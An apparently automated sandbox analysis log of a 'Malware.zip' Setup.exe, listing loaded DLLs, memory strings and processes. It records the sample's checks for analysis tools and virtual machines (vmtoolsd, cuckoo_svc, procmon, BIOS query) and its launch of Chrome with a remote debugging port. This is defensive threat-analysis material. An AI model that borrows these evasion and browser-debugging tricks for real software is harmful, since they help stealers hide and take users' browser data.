        Source: chrome.exe, 0000000D.00000002.2592575503.0000691400EB4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2592427896.0000691400EA8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1901059821.00006914013D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2603832530.0000691401360000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT COUNT(DISTINCT CAST((event_timestamp / 1000000 / 60 / 10) AS int)) FROM metrics WHERE metrics.metric_hash = 'AD411B741D0DA012' AND metrics.metric_value > 0;
        Source: chrome.exe, 0000000D.00000002.2581002033.0000691400A07000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
        Source: chrome.exe, 0000000D.00000002.2595428536.0000691400FC8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT COUNT(metric_value) FROM metrics WHERE metrics.metric_hash = 'CE71BF280B4EB4B5' AND metrics.metric_value > 120;
        Source: chrome.exe, 0000000D.00000002.2592575503.0000691400EB4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2592427896.0000691400EA8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1901059821.00006914013D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2603832530.0000691401360000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT COUNT(DISTINCT CAST((event_timestamp / 1000000 / 60 / 10) AS int)) FROM metrics WHERE metrics.metric_hash = 'B4CFE8741404B691' AND metrics.metric_value > 0;
        Source: chrome.exe, 0000000D.00000002.2598629238.0000691401138000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '19E16122849E343B';
        Source: chrome.exe, 0000000D.00000002.2616545270.0000691401ACD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT COUNT(id) FROM metrics WHERE metrics.metric_hash = '64BD7CCE5A95BF00';
        Source: Setup.exe, 0000000A.00000003.1870132284.0000000003CE3000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000A.00000003.1869952058.0000000004055000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: chrome.exe, 0000000D.00000002.2595428536.0000691400FC8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '79964621D357AB88';
        Source: chrome.exe, 0000000D.00000002.2599149994.0000691401178000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '534661B278B11BD';
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile read: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe "C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe"
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9223
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2380,i,11729313136857741515,7979103794442491089,262144 --variations-seed-version --mojo-platform-channel-handle=2548 /prefetch:3
        Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: wldp.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: twinui.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: wintypes.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: powrprof.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: dwmapi.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: pdh.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: umpdc.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: actxprxy.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: propsys.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: windows.ui.appdefaults.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: windows.ui.immersive.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: ntmarta.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: uiautomationcore.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: dui70.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: duser.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: dwrite.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: bcp47mrm.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: uianimation.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: d3d11.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: dxgi.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: d3d10warp.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: resourcepolicyclient.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: oleacc.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: edputil.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: windows.ui.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: windowmanagementapi.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: textinputframework.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: inputhost.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: twinapi.appcore.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: coremessaging.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: coreuicomponents.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: windowscodecs.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: thumbcache.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: policymanager.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: msvcp110_win.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: apphelp.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: appresolver.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: bcp47langs.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: slc.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: userenv.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: sppc.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: tiledatarepository.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: staterepository.core.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: windows.staterepository.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: wtsapi32.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: windows.staterepositorycore.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: mrmcorer.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: appxdeploymentclient.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: sxs.dll
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: directmanipulation.dll
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\OpenWith.exe | Section loaded: textshaping.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: apphelp.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: acgenral.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: winmm.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: samcli.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: msacm32.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: version.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: userenv.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: dwmapi.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: urlmon.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: mpr.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: winmmbase.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: iertutil.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: srvcli.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: netutils.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: ????? .dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: winhttp.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: webio.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: mswsock.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: iphlpapi.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: winnsi.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: dnsapi.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: rasadhlp.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: fwpuclnt.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: schannel.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: mskeyprotect.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: ntasn1.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: ncrypt.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: ncryptsslp.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: msasn1.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: cryptsp.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: rsaenh.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: cryptbase.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: gpapi.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: dpapi.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: wbemcomn.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: amsi.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\OpenWith.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
        Source: Malware.zip | Static file information: File size 56892136 > 1048576
        Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Process information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: Setup.exe, 0000000A.00000002.2479161543.0000000000E23000.00000004.00000001.01000000.00000007.sdmp | Binary or memory string: PROCMON.EXE
        Source: Setup.exe, 0000000A.00000002.2479068610.0000000000E21000.00000002.00000001.01000000.00000007.sdmp | Binary or memory string: QVERROR MESSAGEERROR NOT SUPPORT SYSTEMMPVMP32ENTRYKERNEL32.DLLERROR MESSAGEERROR NOT SUPPORT SYSTEMERROR MESSAGEERROR NOT SUPPORT SYSTEMERROR MESSAGEERROR NOT SUPPORT SYSTEMVMTOOLSD.EXECUCKOO_SVC.EXEXENSERVICE.EXEPROCMON.EXE
        Source: Setup.exe | Binary or memory string: ,E,,EERROR MESSAGEERROR NOT SUPPORT SYSTEMMPVMP32ENTRYKERNEL32.DLLERROR MESSAGEERROR NOT SUPPORT SYSTEMERROR MESSAGEERROR NOT SUPPORT SYSTEMERROR MESSAGEERROR NOT SUPPORT SYSTEMVMTOOLSD.EXECUCKOO_SVC.EXEXENSERVICE.EXEPROCMON.EXE
        Source: Setup.exe, 0000000A.00000002.2479161543.0000000000E23000.00000004.00000001.01000000.00000007.sdmp | Binary or memory string: XENSERVICE.EXE
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe TID: 6804 | Thread sleep time: -90000s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
        Source: chrome.exe, 0000000D.00000002.2609788431.0000691401688000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: VMware
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C34F000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2538292926.000001B00C310000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Dynamic Memory Integration Service
        Source: chrome.exe, 0000000D.00000003.1929517945.000001B00C3E0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: B Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost
        Source: Setup.exe, 0000000A.00000003.1828376706.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000A.00000002.2483621904.000000000139D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
        Source: Setup.exe, 0000000A.00000002.2479068610.0000000000E21000.00000002.00000001.01000000.00000007.sdmp | Binary or memory string: QvError messageError not support systemMpVmp32Entrykernel32.dllError messageError not support systemError messageError not support systemError messageError not support systemvmtoolsd.execuckoo_svc.exexenservice.exeprocmon.exe
        Source: Setup.exe, 0000000A.00000003.1828376706.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000A.00000002.2483621904.00000000013DF000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000A.00000003.1867447694.00000000013DF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWa
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C310000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Hypervisor Root Partition
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C310000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VHyper-V Dynamic Memory Integration Service
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C2E2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VHyper-V Dynamic Memory Integration Service
        Source: chrome.exe, 0000000D.00000002.2535300930.000001B008D73000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: AlDHyper-V Virtual Machine Bus Pipesy5I
        Source: chrome.exe, 0000000D.00000002.2535300930.000001B008D3E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Hypervisor Logical ProcessoruiT
        Source: chrome.exe, 0000000D.00000002.2535300930.000001B008D73000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: JHyper-V Hypervisor Logical Processor
        Source: chrome.exe, 0000000D.00000003.1921929489.000001B00C3AF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: cation Bytes Read From Cache9542Application Bytes Read From Server9544Application Bytes Read From Server (Not Cached)3260Teredo Relay3262In - Teredo Relay Total Packets: Success + Error3264In - Teredo Relay Success Packets: Total3266In - Teredo Relay Success Packets: Bubbles3268In - Teredo Relay Success Packets: Data Packets3270In - Teredo Relay Error Packets: Total3272In - Teredo Relay Error Packets: Header Error3274In - Teredo Relay Error Packets: Source Error3276In - Teredo Relay Error Packets: Destination Error3278Out - Teredo Relay Total Packets: Success + Error3280Out - Teredo Relay Success Packets3282Out - Teredo Relay Success Packets: Bubbles3284Out - Teredo Relay Success Packets: Data Packets3286Out - Teredo Relay Error Packets3288Out - Teredo Relay Error Packets: Header Error3290Out - Teredo Relay Error Packets: Source Error3292Out - Teredo Relay Error Packets: Destination Error3294In - Teredo Relay Total Packets: Success + Error / sec3296Out - Teredo Relay Total Packets: Success + Error / sec3298In - Teredo Relay Success Packets: Data Packets User Mode3300In - Teredo Relay Success Packets: Data Packets Kernel Mode3302Out - Teredo Relay Success Packets: Data Packets User Mode3304Out - Teredo Relay Success Packets: Data Packets Kernel Mode3306IPHTTPS Session3308Packets received on this session3310Packets sent on this session3312Bytes received on this session3314Bytes sent on this session3316Errors - Transmit errors on this session3318Errors - Receive errors on this session3320Duration - Duration of the session (Seconds)3344DNS64 Global3346AAAA queries - Successful3348AAAA queries - Failed3350IP6.ARPA queries - Matched3352Other queries - Successful3354Other queries - Failed3356AAAA - Synthesized records3322IPHTTPS Global3324In - Total bytes received3326Out - Total bytes sent3328Drops - Neighbor resolution timeouts3330Errors - Authentication Errors3332Out - Total bytes forwarded3334Errors - Transmit errors on the server3336Errors - Receive errors on the server3338In - Total packets received3340Out - Total packets sent3342Sessions - Total sessions3230Teredo Server3232In - Teredo Server Total Packets: Success + Error3234In - Teredo Server Success Packets: Total3236In - Teredo Server Success Packets: Bubbles3238In - Teredo Server Success Packets: Echo3240In - Teredo Server Success Packets: RS-Primary3242In - Teredo Server Success Packets: RS-Secondary3244In - Teredo Server Error Packets: Total3246In - Teredo Server Error Packets: Header Error3248In - Teredo Server Error Packets: Source Error3250In - Teredo Server Error Packets: Destination Error3252In - Teredo Server Error Packets: Authentication Error3254Out - Teredo Server: RA-Primary3256Out - Teredo Server: RA-Secondary 3258In - Teredo Server Total Packets: Success + Error / sec3206Teredo Client3208In - Teredo Router Advertisement3210In - Teredo Bubble3212In - Teredo Data3214In - Teredo Invalid3216Out - Teredo Router Solicitation3218Out - Teredo Bubble3220Out - Teredo Data3222In - Teredo D
        Source: chrome.exe, 0000000D.00000002.2597706000.00006914010DC000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: VMware20,1
        Source: chrome.exe, 0000000D.00000002.2535300930.000001B008D3E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Hypervisor Root Virtual Processord
        Source: chrome.exe, 0000000D.00000003.1922371603.000001B00C3DE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: MANIFEST-000001 Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time48
        Source: chrome.exe, 0000000D.00000003.1922189600.000001B00C3AE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Mon
        Source: chrome.exe, 0000000D.00000002.2535300930.000001B008D73000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: DHyper-V Virtual Machine Bus PipesS47
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C310000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Virtual Machine Bus Pipesl{vi
        Source: chrome.exe, 0000000D.00000003.1921929489.000001B00C3AF000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1929517945.000001B00C3F1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Se
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C310000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V VM Vid Partitionll
        Source: chrome.exe, 0000000D.00000002.2591638099.0000691400E5C000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: VMware Virtual USB Mouse
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C310000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Hypervisor Root Partitionl
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C310000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: THyper-V Hypervisor Root Virtual Processor
        Source: LoaderContent.swf | Binary or memory string: vMCi&
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C310000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V VM Vid PartitionesuWI
        Source: chrome.exe, 0000000D.00000002.2535300930.000001B008D73000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: DHyper-V Hypervisor Root Partition
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C2E2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V slexqmlaukdusbe Bus Pipes
        Source: chrome.exe, 0000000D.00000002.2535300930.000001B008D94000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V slexqmlaukdusbe Bus
        Source: chrome.exe, 0000000D.00000003.1889284406.00006914003D0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: VMware20,1(
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C2E2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: &Hyper-V Hypervisor
        Source: Setup.exe, 0000000A.00000002.2479161543.0000000000E23000.00000004.00000001.01000000.00000007.sdmp | Binary or memory string: vmtoolsd.exeJ9[
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C310000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 2Hyper-V VM Vid Partitionun
        Source: chrome.exe, 0000000D.00000002.2489825006.000001B005235000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C310000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Virtual Machine Bus Pipes>y,
        Source: Setup.exe | Binary or memory string: ,e,,eError messageError not support systemMpVmp32Entrykernel32.dllError messageError not support systemError messageError not support systemError messageError not support systemvmtoolsd.execuckoo_svc.exexenservice.exeprocmon.exe
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C310000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Hypervisor Root Virtual ProcessorgXZ
        Source: chrome.exe, 0000000D.00000002.2535300930.000001B008D73000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: sWDHyper-V Hypervisor Root PartitionO5;
        Source: chrome.exe, 0000000D.00000002.2599149994.0000691401178000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=63552d2a-7c81-44f6-a4b2-fe8b4fcdee48
